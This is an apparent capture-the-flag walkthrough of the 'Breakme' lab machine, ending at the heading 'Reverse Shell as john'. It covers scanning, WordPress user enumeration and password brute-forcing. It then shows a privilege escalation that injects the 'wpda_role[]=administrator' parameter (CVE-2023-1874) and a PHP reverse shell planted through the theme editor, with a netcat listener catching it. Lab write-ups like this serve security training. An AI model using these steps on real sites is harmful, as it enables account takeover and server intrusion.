Breakme

Break this secure system and get the flags, if you can.

Recon

Let's start with a nmap scan.

┌──(kali㉿kali)-[~]
└─$ nmap breakme.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-07 11:14 IST
Nmap scan report for breakme.thm (10.10.221.241)
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 22,80 breakme.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-07 11:21 IST
Nmap scan report for breakme.thm (10.10.221.241)
Host is up (0.14s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 8e:4f:77:7f:f6:aa:6a:dc:17:c9:bf:5a:2b:eb:8c:41 (RSA)
|   256 a3:9c:66:73:fc:b9:23:c0:0f:da:1d:c9:84:d6:b1:4a (ECDSA)
|_  256 6d:c2:0e:89:25:55:10:a9:9e:41:6e:0d:81:9a:17:cb (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds

We use Feroxbuster for a directory scan. The /wordpress/ directory it finds makes it evident that the web server is running WordPress.

┌──(kali㉿kali)-[~]
└─$ feroxbuster -u http://breakme.thm/ -w /usr/share/wordlists/dirb/big.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://breakme.thm/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirb/big.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       24l      126w    10355c http://breakme.thm/icons/openlogo-75.png
200      GET      368l      933w    10701c http://breakme.thm/
301      GET        9l       28w      311c http://breakme.thm/manual => http://breakme.thm/manual/
301      GET        9l       28w      314c http://breakme.thm/manual/da => http://breakme.thm/manual/da/
301      GET        9l       28w      314c http://breakme.thm/manual/en => http://breakme.thm/manual/en/
301      GET        9l       28w      314c http://breakme.thm/manual/de => http://breakme.thm/manual/de/
301      GET        9l       28w      314c http://breakme.thm/manual/es => http://breakme.thm/manual/es/
301      GET        9l       28w      318c http://breakme.thm/manual/images => http://breakme.thm/manual/images/
200      GET        3l       26w     3083c http://breakme.thm/manual/images/mod_rewrite_fig1.png
200      GET        1l        5w       87c http://breakme.thm/manual/images/right.gif
200      GET       10l       34w     2420c http://breakme.thm/manual/images/mod_rewrite_fig2.png
200      GET       18l      118w     6536c http://breakme.thm/manual/images/feather.gif
200      GET        1l        5w       84c http://breakme.thm/manual/images/down.gif
200      GET       14l       54w     2412c http://breakme.thm/manual/images/index.gif
200      GET       25l       87w     6358c http://breakme.thm/manual/images/mod_rewrite_fig1.gif
200      GET       16l       74w     5983c http://breakme.thm/manual/images/ssl_intro_fig1.png
200      GET        8l       24w     1868c http://breakme.thm/manual/images/mod_filter_new.png
200      GET       26l      111w    10616c http://breakme.thm/manual/images/ssl_intro_fig1.gif
200      GET       50l      355w    31098c http://breakme.thm/manual/images/custom_errordocs.png
200      GET      105l      493w    29291c http://breakme.thm/manual/images/caching_fig1.gif
301      GET        9l       28w      314c http://breakme.thm/manual/fr => http://breakme.thm/manual/fr/
200      GET      158l     1179w    92140c http://breakme.thm/manual/images/build_a_mod_3.png
200      GET      931l     5534w   463351c http://breakme.thm/manual/images/bal-man.png
301      GET        9l       28w      314c http://breakme.thm/manual/ja => http://breakme.thm/manual/ja/
301      GET        9l       28w      314c http://breakme.thm/manual/ko => http://breakme.thm/manual/ko/
301      GET        9l       28w      324c http://breakme.thm/manual/da/developer => http://breakme.thm/manual/da/developer/
301      GET        9l       28w      318c http://breakme.thm/manual/da/faq => http://breakme.thm/manual/da/faq/
301      GET        9l       28w      324c http://breakme.thm/manual/en/developer => http://breakme.thm/manual/en/developer/
301      GET        9l       28w      324c http://breakme.thm/manual/de/developer => http://breakme.thm/manual/de/developer/
301      GET        9l       28w      324c http://breakme.thm/manual/es/developer => http://breakme.thm/manual/es/developer/
301      GET        9l       28w      317c http://breakme.thm/manual/pt-br => http://breakme.thm/manual/pt-br/
301      GET        9l       28w      320c http://breakme.thm/manual/da/howto => http://breakme.thm/manual/da/howto/
301      GET        9l       28w      324c http://breakme.thm/manual/ja/developer => http://breakme.thm/manual/ja/developer/
301      GET        9l       28w      314c http://breakme.thm/manual/ru => http://breakme.thm/manual/ru/
301      GET        9l       28w      318c http://breakme.thm/manual/es/faq => http://breakme.thm/manual/es/faq/
301      GET        9l       28w      318c http://breakme.thm/manual/de/faq => http://breakme.thm/manual/de/faq/
301      GET        9l       28w      317c http://breakme.thm/manual/style => http://breakme.thm/manual/style/
200      GET       42l      190w     1425c http://breakme.thm/manual/style/sitemap.dtd
200      GET       24l      127w      907c http://breakme.thm/manual/style/lang.dtd
301      GET        9l       28w      320c http://breakme.thm/manual/en/howto => http://breakme.thm/manual/en/howto/
200      GET     1622l     6889w    73959c http://breakme.thm/manual/style/scripts/prettify.js
200      GET        5l       21w      167c http://breakme.thm/manual/style/scripts/MINIFY
301      GET        9l       28w      320c http://breakme.thm/manual/es/howto => http://breakme.thm/manual/es/howto/
301      GET        9l       28w      320c http://breakme.thm/manual/de/howto => http://breakme.thm/manual/de/howto/
301      GET        9l       28w      314c http://breakme.thm/manual/tr => http://breakme.thm/manual/tr/
301      GET        9l       28w      314c http://breakme.thm/wordpress => http://breakme.thm/wordpress/
301      GET        9l       28w      324c http://breakme.thm/manual/ko/developer => http://breakme.thm/manual/ko/developer/
301      GET        9l       28w      319c http://breakme.thm/manual/da/misc => http://breakme.thm/manual/da/misc/
301      GET        9l       28w      320c http://breakme.thm/manual/ja/howto => http://breakme.thm/manual/ja/howto/
301      GET        9l       28w      318c http://breakme.thm/manual/da/mod => http://breakme.thm/manual/da/mod/
301      GET        9l       28w      318c http://breakme.thm/manual/ko/faq => http://breakme.thm/manual/ko/faq/
301      GET        9l       28w      320c http://breakme.thm/manual/fr/howto => http://breakme.thm/manual/fr/howto/
301      GET        9l       28w      317c http://breakme.thm/manual/zh-cn => http://breakme.thm/manual/zh-cn/
301      GET        9l       28w      319c http://breakme.thm/manual/en/misc => http://breakme.thm/manual/en/misc/
301      GET        9l       28w      319c http://breakme.thm/manual/es/misc => http://breakme.thm/manual/es/misc/
301      GET        9l       28w      318c http://breakme.thm/manual/en/mod => http://breakme.thm/manual/en/mod/
301      GET        9l       28w      323c http://breakme.thm/manual/da/platform => http://breakme.thm/manual/da/platform/
301      GET        9l       28w      323c http://breakme.thm/manual/da/programs => http://breakme.thm/manual/da/programs/
301      GET        9l       28w      319c http://breakme.thm/manual/de/misc => http://breakme.thm/manual/de/misc/
301      GET        9l       28w      318c http://breakme.thm/manual/es/mod => http://breakme.thm/manual/es/mod/
301      GET        9l       28w      321c http://breakme.thm/manual/es/vhosts => http://breakme.thm/manual/es/vhosts/
301      GET        9l       28w      324c http://breakme.thm/manual/tr/developer => http://breakme.thm/manual/tr/developer/
301      GET        9l       28w      325c http://breakme.thm/wordpress/wp-content => http://breakme.thm/wordpress/wp-content/
301      GET        9l       28w      323c http://breakme.thm/wordpress/wp-admin => http://breakme.thm/wordpress/wp-admin/
301      GET        9l       28w      326c http://breakme.thm/wordpress/wp-includes => http://breakme.thm/wordpress/wp-includes/
301      GET        9l       28w      333c http://breakme.thm/wordpress/wp-includes/assets => http://breakme.thm/wordpress/wp-includes/assets/
301      GET        9l       28w      333c http://breakme.thm/wordpress/wp-includes/blocks => http://breakme.thm/wordpress/wp-includes/blocks/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/certificates => http://breakme.thm/wordpress/wp-includes/certificates/
301      GET        9l       28w      327c http://breakme.thm/wordpress/wp-admin/css => http://breakme.thm/wordpress/wp-admin/css/
301      GET        9l       28w      330c http://breakme.thm/wordpress/wp-includes/css => http://breakme.thm/wordpress/wp-includes/css/
301      GET        9l       28w      336c http://breakme.thm/wordpress/wp-includes/customize => http://breakme.thm/wordpress/wp-includes/customize/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/audio => http://breakme.thm/wordpress/wp-includes/blocks/audio/
301      GET        9l       28w      342c http://breakme.thm/wordpress/wp-includes/blocks/archives => http://breakme.thm/wordpress/wp-includes/blocks/archives/
301      GET        9l       28w      340c http://breakme.thm/wordpress/wp-includes/blocks/avatar => http://breakme.thm/wordpress/wp-includes/blocks/avatar/
301      GET        9l       28w      340c http://breakme.thm/wordpress/wp-includes/blocks/button => http://breakme.thm/wordpress/wp-includes/blocks/button/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/buttons => http://breakme.thm/wordpress/wp-includes/blocks/buttons/
301      GET        9l       28w      342c http://breakme.thm/wordpress/wp-includes/blocks/calendar => http://breakme.thm/wordpress/wp-includes/blocks/calendar/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/block => http://breakme.thm/wordpress/wp-includes/blocks/block/
301      GET        9l       28w      344c http://breakme.thm/wordpress/wp-includes/blocks/categories => http://breakme.thm/wordpress/wp-includes/blocks/categories/
301      GET        9l       28w      330c http://breakme.thm/wordpress/wp-admin/images => http://breakme.thm/wordpress/wp-admin/images/
301      GET        9l       28w      326c http://breakme.thm/wordpress/wp-admin/js => http://breakme.thm/wordpress/wp-admin/js/
301      GET        9l       28w      332c http://breakme.thm/wordpress/wp-admin/includes => http://breakme.thm/wordpress/wp-admin/includes/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/blocks/code => http://breakme.thm/wordpress/wp-includes/blocks/code/
301      GET        9l       28w      333c http://breakme.thm/wordpress/wp-includes/images => http://breakme.thm/wordpress/wp-includes/images/
301      GET        9l       28w      340c http://breakme.thm/wordpress/wp-includes/blocks/column => http://breakme.thm/wordpress/wp-includes/blocks/column/
301      GET        9l       28w      342c http://breakme.thm/wordpress/wp-includes/blocks/comments => http://breakme.thm/wordpress/wp-includes/blocks/comments/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/columns => http://breakme.thm/wordpress/wp-includes/blocks/columns/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/cover => http://breakme.thm/wordpress/wp-includes/blocks/cover/
301      GET        9l       28w      329c http://breakme.thm/wordpress/wp-includes/js => http://breakme.thm/wordpress/wp-includes/js/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/details => http://breakme.thm/wordpress/wp-includes/blocks/details/
301      GET        9l       28w      329c http://breakme.thm/wordpress/wp-admin/maint => http://breakme.thm/wordpress/wp-admin/maint/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/embed => http://breakme.thm/wordpress/wp-includes/blocks/embed/
301      GET        9l       28w      334c http://breakme.thm/wordpress/wp-admin/css/colors => http://breakme.thm/wordpress/wp-admin/css/colors/
301      GET        9l       28w      331c http://breakme.thm/wordpress/wp-admin/network => http://breakme.thm/wordpress/wp-admin/network/
301      GET        9l       28w      335c http://breakme.thm/wordpress/wp-includes/css/dist => http://breakme.thm/wordpress/wp-includes/css/dist/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/blocks/file => http://breakme.thm/wordpress/wp-includes/blocks/file/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/gallery => http://breakme.thm/wordpress/wp-includes/blocks/gallery/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/group => http://breakme.thm/wordpress/wp-includes/blocks/group/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/heading => http://breakme.thm/wordpress/wp-includes/blocks/heading/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/blocks/html => http://breakme.thm/wordpress/wp-includes/blocks/html/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/image => http://breakme.thm/wordpress/wp-includes/blocks/image/
301      GET        9l       28w      333c http://breakme.thm/wordpress/wp-content/plugins => http://breakme.thm/wordpress/wp-content/plugins/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/blocks/list => http://breakme.thm/wordpress/wp-includes/blocks/list/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/images/crystal => http://breakme.thm/wordpress/wp-includes/images/crystal/
301      GET        9l       28w      335c http://breakme.thm/wordpress/wp-includes/sitemaps => http://breakme.thm/wordpress/wp-includes/sitemaps/
301      GET        9l       28w      334c http://breakme.thm/wordpress/wp-includes/js/dist => http://breakme.thm/wordpress/wp-includes/js/dist/
301      GET        9l       28w      334c http://breakme.thm/wordpress/wp-includes/js/crop => http://breakme.thm/wordpress/wp-includes/js/crop/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/missing => http://breakme.thm/wordpress/wp-includes/blocks/missing/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/blocks/more => http://breakme.thm/wordpress/wp-includes/blocks/more/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-content/plugins/akismet => http://breakme.thm/wordpress/wp-content/plugins/akismet/
301      GET        9l       28w      328c http://breakme.thm/wordpress/wp-admin/user => http://breakme.thm/wordpress/wp-admin/user/
301      GET        9l       28w      344c http://breakme.thm/wordpress/wp-includes/blocks/navigation => http://breakme.thm/wordpress/wp-includes/blocks/navigation/
301      GET        9l       28w      332c http://breakme.thm/wordpress/wp-content/themes => http://breakme.thm/wordpress/wp-content/themes/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/query => http://breakme.thm/wordpress/wp-includes/blocks/query/
301      GET        9l       28w      340c http://breakme.thm/wordpress/wp-includes/blocks/spacer => http://breakme.thm/wordpress/wp-includes/blocks/spacer/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/images/smilies => http://breakme.thm/wordpress/wp-includes/images/smilies/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/js/swfupload => http://breakme.thm/wordpress/wp-includes/js/swfupload/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/js/thickbox => http://breakme.thm/wordpress/wp-includes/js/thickbox/
301      GET        9l       28w      337c http://breakme.thm/wordpress/wp-includes/js/tinymce => http://breakme.thm/wordpress/wp-includes/js/tinymce/
301      GET        9l       28w      345c http://breakme.thm/wordpress/wp-includes/sitemaps/providers => http://breakme.thm/wordpress/wp-includes/sitemaps/providers/
301      GET        9l       28w      334c http://breakme.thm/wordpress/wp-admin/js/widgets => http://breakme.thm/wordpress/wp-admin/js/widgets/

Visiting the index page, we are just greeted with an Apache2 Debian default page.

We visit the WordPress site and discover that it is a straightforward blog.

http://breakme.thm/wordpress/

We seem to be in the right place: http://breakme.thm/wordpress/index.php/breakme/.

Next, we use WPScan to analyze the WordPress application. It reveals that the site is running version 6.4.3, which contains a vulnerability allowing user enumeration.

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct  7 12:17:29 2024
.
.
.
.
[+] WordPress version 6.4.3 identified (Insecure, released on 2024-01-30).
 | Found By: Rss Generator (Passive Detection)
 |  - http://breakme.thm/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
 |  - http://breakme.thm/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>

[+] WordPress theme in use: twentytwentyfour
 | Location: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.2
 | Style URL: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'

Initial Access

We continue focusing on the WordPress site and run additional WPScan assessments to extract more useful information. These scans help identify potential vulnerabilities that could be exploited.

WPScan Part I - Enum Credentials

We begin by attempting to enumerate existing users on the WordPress site. Through this process, we successfully identify two users: bob and admin.

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/ --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct  7 12:29:14 2024
.
.
.
[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://breakme.thm/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] bob
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Next, we proceed to brute-force the passwords for both users. We manage to successfully crack the password for user bob.

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/ -U admin,bob -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct  7 12:31:09 2024
.
.
.
.
[+] Performing password attack on Wp Login against 2 user/s
[SUCCESS] - bob / soccer                                                                                                                                                                                                                    
^Cying admin / 121589 Time: 00:20:10 <                                                                                                                                                            > (18419 / 28688814)  0.06%  ETA: ??:??:??
[!] Valid Combinations Found:
 | Username: bob, Password: [REDACTED]

A link in the sample page http://breakme.thm/wordpress/index.php/sample-page takes us to the login window.

We log in using the discovered credentials but realize that the account doesn't have elevated privileges. The admin dashboard is not visible, indicating this user has limited permissions.

We can make changes to our profile and are able to make minor adjustments at the dashboard.

WPScan Part II - Further Enumeration (WPScan API Key)

It looks like we haven't discovered everything yet, so we run WPScan again, this time with an API key.

A key can be obtained free of charge by registering on the WPScan website. With it, WPScan enriches its findings with the associated CVEs.

Running WPScan with the API key turns up an interesting finding: CVE-2023-1874, WP Data Access <= 5.3.7 - Authenticated (Subscriber+) Privilege Escalation.

┌──(kali㉿kali)-[~]
└─$ export WPSCAN_API_TOKEN=[REDACTED]
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct  7 12:53:11 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.56 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://breakme.thm/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://breakme.thm/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://breakme.thm/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.4.3 identified (Insecure, released on 2024-01-30).
 | Found By: Rss Generator (Passive Detection)
 |  - http://breakme.thm/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
 |  - http://breakme.thm/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
 |     Fixed in: 6.4.4
 |     References:
 |      - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
 |      - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/
 |
 | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API
 |     Fixed in: 6.4.5
 |     References:
 |      - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/
 |
 | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
 |     Fixed in: 6.4.5
 |     References:
 |      - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/
 |
 | [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
 |     Fixed in: 6.4.5
 |     References:
 |      - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/

[+] WordPress theme in use: twentytwentyfour
 | Location: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.2
 | Style URL: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-data-access
 | Location: http://breakme.thm/wordpress/wp-content/plugins/wp-data-access/
 | Last Updated: 2024-09-18T00:01:00.000Z
 | [!] The version is out of date, the latest version is 5.5.14
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 3 vulnerabilities identified:
 |
 | [!] Title: WP Data Access < 5.3.8 - Subscriber+ Privilege Escalation
 |     Fixed in: 5.3.8
 |     References:
 |      - https://wpscan.com/vulnerability/7871b890-5172-40aa-88f2-a1b95e240ad4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1874
 |      - https://www.wordfence.com/blog/2023/04/privilege-escalation-vulnerability-patched-promptly-in-wp-data-access-wordpress-plugin/
 |
 | [!] Title: Freemius SDK < 2.5.10 - Reflected Cross-Site Scripting
 |     Fixed in: 5.3.11
 |     References:
 |      - https://wpscan.com/vulnerability/39d1f22f-ea34-4d94-9dc2-12661cf69d36
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33999
 |
 | [!] Title: WP Data Access < 5.5.9 - Cross-Site Request Forgery
 |     Fixed in: 5.5.9
 |     References:
 |      - https://wpscan.com/vulnerability/4fe0d330-6511-4500-ac3f-b9bb944b8f0e
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43295
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/85a33508-71f2-4aa1-8d51-667eb0690fbd
 |
 | Version: 5.3.5 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://breakme.thm/wordpress/wp-content/plugins/wp-data-access/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:05 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:05

[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 22

[+] Finished: Mon Oct  7 12:53:26 2024
[+] Requests Done: 176
[+] Cached Requests: 5
[+] Data Sent: 47.983 KB
[+] Data Received: 311.351 KB
[+] Memory used: 273.23 MB
[+] Elapsed time: 00:00:14

We can find out more about the vulnerability (CVE-2023-1874, WP Data Access < 5.3.8) in the Wordfence post referenced in the scan output above. The installed version is 5.3.5, so the site is affected: when a user updates their own profile, the plugin applies any roles passed in a wpda_role[] parameter without checking that the user is allowed to assign them.

So, logged in with our low-privileged account, we first open the profile page and submit a normal profile update.

We intercept the request with Burp Suite and add the following parameter, which is not part of the normal request:

&wpda_role[]=administrator

This assigns us the administrator role. Be careful with the parameter: if it is mistyped or given an invalid value, we can end up with no valid role at all, lose access to the dashboard, and only get it back by restarting the machine.

Reverse Shell

To establish a foothold, we use our new administrator rights to get a reverse shell. Following the HackTricks approach, we overwrite a theme template with a PHP reverse shell; revshells.com generates a suitable Pentest Monkey payload pointed at our machine. We start the listener before triggering the payload.

Next, we open the theme editor to replace a template with the reverse shell:

http://breakme.thm/wordpress/wp-admin/theme-editor.php

The active Twenty Twenty-Four theme is a block theme and has no PHP 404 template, so we switch the editor to Twenty Twenty-One, which ships a 404.php. We select that file, replace its entire content with the reverse shell and update the file. This only works because the site has not set DISALLOW_FILE_EDIT in wp-config.php, which would disable the theme and plugin editors for everyone, administrators included.

Now we only need to request the edited template directly:

http://breakme.thm/wordpress/wp-content/themes/twentytwentyone/404.php

Our listener receives the connection and we upgrade the shell. We are www-data and, for now, cannot read the first flag.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.221.241] 43952
Linux Breakme 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64 GNU/Linux
 03:49:00 up  2:18,  0 users,  load average: 0.00, 0.00, 0.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (616): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Breakme:/$ 

First, let's upgrade this shell to a proper interactive TTY.

We transfer linpeas to the machine and run it.

The linpeas output shows two other users, john and youcef, and some of their files that we are able to access.

The first flag is in john's home directory, but we cannot read it as www-data, so we need to become john.

Reverse Shell as john

